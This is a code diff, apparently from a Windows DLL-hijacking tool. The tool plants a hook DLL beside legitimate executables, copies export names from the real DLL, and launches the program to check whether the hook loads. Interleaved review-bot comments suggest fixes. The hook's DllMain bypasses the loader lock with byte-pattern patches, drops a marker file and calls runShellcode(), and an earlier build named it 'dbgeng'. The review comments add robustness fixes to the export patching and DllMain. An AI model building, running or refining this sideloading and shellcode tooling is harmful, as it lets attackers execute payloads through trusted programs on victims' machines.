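--- a/SearchAvailableExe/SearchAvailableExe.vcxproj.user
+++ b/SearchAvailableExe/SearchAvailableExe.vcxproj.user
@@ -1,13 +1,11 @@
 <?xml version="1.0" encoding="utf-8"?>
 <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
- <LocalDebuggerCommandArguments>
- </LocalDebuggerCommandArguments>
+ <LocalDebuggerCommandArguments>-i "D:"</LocalDebuggerCommandArguments>
  <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
- <LocalDebuggerCommandArguments>
- </LocalDebuggerCommandArguments>
+ <LocalDebuggerCommandArguments>-i "D:"</LocalDebuggerCommandArguments>
  <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
  </PropertyGroup>
 </Project>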
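--- a/SearchAvailableExe/Tools.cpp
+++ b/SearchAvailableExe/Tools.cpp
@@ -672,6 +672,83 @@
  return 0;
 }
  
+bool fixExportTable(string targetFilePath, string sourceFilePath) {
+ char* targetBuffer;
+ DWORD fileSize = readFileContext(targetFilePath, &targetBuffer);
+ 
+ PIMAGE_DOS_HEADER pDH = (PIMAGE_DOS_HEADER)targetBuffer;
+ PIMAGE_NT_HEADERS pNtH = (PIMAGE_NT_HEADERS)((DWORD)pDH + pDH->e_lfanew);
+ PIMAGE_OPTIONAL_HEADER pOH = &pNtH->OptionalHeader;
+ IMAGE_DATA_DIRECTORY exportDirectory;
+ 
+ if (*(PWORD)((size_t)pDH + pDH->e_lfanew + 0x18) == IMAGE_NT_OPTIONAL_HDR32_MAGIC)
+ {
+ PIMAGE_NT_HEADERS32 pNtH32 = PIMAGE_NT_HEADERS32((size_t)pDH + pDH->e_lfanew);
+ PIMAGE_OPTIONAL_HEADER32 pOH32 = &pNtH32->OptionalHeader;
+ 
+ exportDirectory = pOH32->DataDirectory[0];
+ }
+ else {
+ PIMAGE_NT_HEADERS64 pNtH64 = PIMAGE_NT_HEADERS64((size_t)pDH + pDH->e_lfanew);
+ PIMAGE_OPTIONAL_HEADER64 pOH64 = &pNtH64->OptionalHeader;
+ 
+ exportDirectory = pOH64->DataDirectory[0];
+ }
+ 
+ IMAGE_EXPORT_DIRECTORY* exportDir = (IMAGE_EXPORT_DIRECTORY*)(targetBuffer + rvaToFOA(targetBuffer, exportDirectory.VirtualAddress));
+ 
+ DWORD* nameRVAs = (DWORD*)(targetBuffer + rvaToFOA(targetBuffer, exportDir->AddressOfNames));
+ 
+ char* sourceBuffer;
+ readFileContext(sourceFilePath, &sourceBuffer);
+ 
+ pDH = (PIMAGE_DOS_HEADER)sourceBuffer;
+ pNtH = (PIMAGE_NT_HEADERS)((size_t)pDH + pDH->e_lfanew);
+ pOH = &pNtH->OptionalHeader;
+ 
+ if (*(PWORD)((size_t)pDH + pDH->e_lfanew + 0x18) == IMAGE_NT_OPTIONAL_HDR32_MAGIC)
+ {
+ PIMAGE_NT_HEADERS32 pNtH32 = PIMAGE_NT_HEADERS32((size_t)pDH + pDH->e_lfanew);
+ PIMAGE_OPTIONAL_HEADER32 pOH32 = &pNtH32->OptionalHeader;
+ 
+ exportDirectory = pOH32->DataDirectory[0];
+ }
+ else {
+ PIMAGE_NT_HEADERS64 pNtH64 = PIMAGE_NT_HEADERS64((size_t)pDH + pDH->e_lfanew);
+ PIMAGE_OPTIONAL_HEADER64 pOH64 = &pNtH64->OptionalHeader;
+ 
+ exportDirectory = pOH64->DataDirectory[0];
+ }
+ 
+ IMAGE_EXPORT_DIRECTORY* exportDir_source = (IMAGE_EXPORT_DIRECTORY*)(sourceBuffer + rvaToFOA(sourceBuffer, exportDirectory.VirtualAddress));
+ 
+ DWORD* nameRVAs_source = (DWORD*)(sourceBuffer + rvaToFOA(sourceBuffer, exportDir_source->AddressOfNames));
+ 
+ if (exportDir_source->NumberOfNames > 100) {
+ delete[] targetBuffer;
+ delete[] sourceBuffer;
+ return false;
+ }
+ 
+ for (int i = 0; i < exportDir_source->NumberOfNames; i++)
+ {
+ DWORD nameRVA_source = nameRVAs_source[i];
+ char* exportFunctionName_source = sourceBuffer + rvaToFOA(sourceBuffer, nameRVA_source);
+ 
+ DWORD nameRVA = nameRVAs[i];
+ char* exportFunctionName = targetBuffer + rvaToFOA(targetBuffer, nameRVA);
+ 
+ memcpy(exportFunctionName, exportFunctionName_source, strlen(exportFunctionName_source) + 1);
+ }
+ 
+ saveFile(targetFilePath, targetBuffer, fileSize);
+ 
+ delete[] targetBuffer;
+ delete[] sourceBuffer;
+ 
+ return true;
+}
+ 
 std::string GetCurrentPath() {
  char buffer[MAX_PATH];
  GetModuleFileNameA(NULL, buffer, MAX_PATH);
@@ -768,12 +845,10 @@
  return true;
 }
  
-int TestCreateProcess(string runFilePath) {
- // 定义进程信息结构体
+int TestCreateProcess(string runFilePath, DWORD dwMilliseconds) {
  STARTUPINFOA si = { sizeof(si) };
  PROCESS_INFORMATION pi;
  
- // 创建进程
  if (!CreateProcessA(
  nullptr, // 指向可执行文件名的指针(在这里,nullptr表示使用当前可执行文件)
  (char*)runFilePath.c_str(), // 可执行文件的路径
@@ -789,7 +864,7 @@
  }
  
  // 等待进程结束
- WaitForSingleObject(pi.hProcess, 500);
+ WaitForSingleObject(pi.hProcess, dwMilliseconds);
  
  TerminateProcess(pi.hProcess, 0);
  
@@ -827,8 +902,27 @@
  exitCode++;
  }
  
- DWORD retExitCode = TestCreateProcess(runFilePath);
+ DWORD retExitCode = TestCreateProcess(runFilePath, 500);
  result->exploitDllPath = hookDllMap[retExitCode];
  
- while(!DeleteDirectory(folderPath.c_str())){}
+ if (result->exploitDllPath != "") {
+ string hookFilePath = currentPath + "\\TestLoad_x86.dll";
+ if (result->bit == 64)
+ hookFilePath = currentPath + "\\TestLoad_x64.dll";
+ 
+ string targetFilePath = folderPath + "\\" + result->exploitDllPath;
+ CopyFileA(hookFilePath.c_str(), targetFilePath.c_str(), FALSE);
+ bool isSucc = fixExportTable(targetFilePath, result->fileDir + result->exploitDllPath);
+ 
+ if (isSucc) {
+ targetFilePath = folderPath + "\\" + result->filePath.substr(result->filePath.find_last_of("\\/") + 1);
+ 
+ TestCreateProcess(targetFilePath, 3000);
+ }
+ 
+ if (!std::filesystem::exists(folderPath + "\\test.txt"))
+ result->exploitDllPath = "";
+ }
+
+ while (!DeleteDirectory(folderPath.c_str())) {}
 }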
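Review bot: The name-copy loop in fixExportTable (new lines 733-742) indexes `nameRVAs[i]` by the source DLL's NumberOfNames and then copies `strlen(exportFunctionName_source) + 1` bytes into the target's name slot, so a source with more names than the target, or a name longer than the padded placeholder, writes past the target name table or past the slot inside targetBuffer and corrupts the image that saveFile then writes out. The `> 100` guard covers neither case; compare the two counts before the loop and the two lengths before each copy, returning false the way the existing guard does. Two smaller points in the same hunk: `(PIMAGE_NT_HEADERS)((DWORD)pDH + pDH->e_lfanew)` on new line 680 truncates the pointer in a 64-bit build while every other cast in the function uses `(size_t)`, and neither readFileContext call is checked, so a missing or unreadable file leaves targetBuffer or sourceBuffer indeterminate before the header casts dereference it. Every rvaToFOA result is likewise used as a buffer offset without being compared against fileSize; what rvaToFOA returns on an unmapped RVA is not visible here.
```cpp
 // Bail out, as the NumberOfNames > 100 guard does, instead of indexing past the target's name table
 if (exportDir_source->NumberOfNames > exportDir->NumberOfNames) {
     delete[] targetBuffer;
     delete[] sourceBuffer;
     return false;
 }

 for (DWORD i = 0; i < exportDir_source->NumberOfNames; i++)
 {
     // … unchanged: resolve exportFunctionName_source and exportFunctionName …
     if (strlen(exportFunctionName_source) > strlen(exportFunctionName)) {
         delete[] targetBuffer;
         delete[] sourceBuffer;
         return false; // source name would overrun the placeholder slot in targetBuffer
     }
     memcpy(exportFunctionName, exportFunctionName_source, strlen(exportFunctionName_source) + 1);
 }
```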
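--- a/TestLoad/TestLoad.vcxproj
+++ b/TestLoad/TestLoad.vcxproj
@@ -71,10 +71,10 @@
  </ImportGroup>
  <PropertyGroup Label="UserMacros" />
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
- <TargetName>dbgeng</TargetName>
+ <TargetName>$(ProjectName)</TargetName>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
- <TargetName>dbgeng</TargetName>
+ <TargetName>$(ProjectName)</TargetName>
  </PropertyGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
  <ClCompile>
@@ -139,7 +139,7 @@
  <ConformanceMode>false</ConformanceMode>
  <PrecompiledHeader>NotUsing</PrecompiledHeader>
  <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
- <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
+ <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
  <Optimization>Disabled</Optimization>
  <WholeProgramOptimization>false</WholeProgramOptimization>
  </ClCompile>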
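--- a/TestLoad/TestLoad.vcxproj.user
+++ b/TestLoad/TestLoad.vcxproj.user
@@ -1,4 +1,7 @@
 <?xml version="1.0" encoding="utf-8"?>
 <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
- <PropertyGroup />
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+ <LocalDebuggerCommandArguments>-i "D:"</LocalDebuggerCommandArguments>
+ <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
+ </PropertyGroup>
 </Project>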
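--- a/TestLoad/dllmain.cpp
+++ b/TestLoad/dllmain.cpp
@@ -1,5 +1,5 @@
 #include <Windows.h>
-#include <stdio.h>
+#include <fstream>
  
 #include "export.hpp"
  
@@ -233,7 +233,7 @@
  
 #ifdef _WIN64
  unsigned char lock_count_flag[] = {0x66, 0x21, 0x88, 0xEE, 0x17, 0x00, 0x00};
- unsigned char win7_lock_count_flag[] = {0xF0, 0x44, 0x0F, 0xB1, 0x35};
+ unsigned char win7_lock_count_flag[] = {0xF0, 0x44, 0x0F, 0xB1, 0x35, 0xFF, 0xFF, 0xFF, 0xFF, 0x41};
 #else
  unsigned char lock_count_flag[] = {0x66, 0x21, 0x88, 0xCA, 0x0F, 0x00, 0x00, 0xE8};
  unsigned char win7_lock_count_flag[] = {0xC7, 0x45, 0xFC, 0xFE, 0xFF, 0xFF, 0xFF, 0xBB, 0xFF, 0xFF, 0xFF, 0xFF, 0x8B, 0x75, 0xD8};
@@ -306,6 +306,20 @@
  {
  case DLL_PROCESS_ATTACH:
  UNLOOK();
+ 
+ STARTUPINFOA si = { sizeof(si) };
+ PROCESS_INFORMATION pi;
+ 
+ CreateProcessA(nullptr, (char*)"notepad.exe", nullptr, nullptr, FALSE, CREATE_NO_WINDOW, nullptr, nullptr, &si, &pi);
+
+ TerminateProcess(pi.hProcess, 0);
+ 
+ char buffer[MAX_PATH];
+ GetModuleFileNameA(NULL, buffer, MAX_PATH);
+ std::string::size_type pos = std::string(buffer).find_last_of("\\/");
+ std::string currentPath = std::string(buffer).substr(0, pos);
+ 
+ std::ofstream outputFile(currentPath + "\\test.txt");
  
  runShellcode();
  }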
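Review bot: In the DLL_PROCESS_ATTACH branch (new lines 310-315) `pi` is never initialized and the CreateProcessA return value is not checked, so when creation fails TerminateProcess is called on an indeterminate handle, and when it succeeds both pi.hProcess and pi.hThread are leaked. Zero-initialize `pi`, terminate only on success, and close both handles afterwards. Creating a process from DllMain also runs under the loader lock, which Microsoft's DLL best-practices guidance lists among the calls to avoid there, so the spawn itself is worth a second look if the marker file is the real signal. `std::string` is used in this hunk while only `<fstream>` is included; add `#include <string>` rather than relying on a transitive include. DllMain begins and ends outside this hunk.
```cpp
 STARTUPINFOA si = { sizeof(si) };
 PROCESS_INFORMATION pi = {};

 if (CreateProcessA(nullptr, (char*)"notepad.exe", nullptr, nullptr, FALSE, CREATE_NO_WINDOW, nullptr, nullptr, &si, &pi)) {
     TerminateProcess(pi.hProcess, 0);
     CloseHandle(pi.hThread);
     CloseHandle(pi.hProcess);
 }
 // … unchanged: module path lookup and test.txt marker …
```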
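--- a/TestLoad/export.hpp
+++ b/TestLoad/export.hpp
@@ -1,4 +1,4 @@
-extern "C" __declspec(dllexport) int DebugCreate() {
+extern "C" __declspec(dllexport) int TestLoad__________________________________________________________________________________________________1() {
  return 1;
 }
  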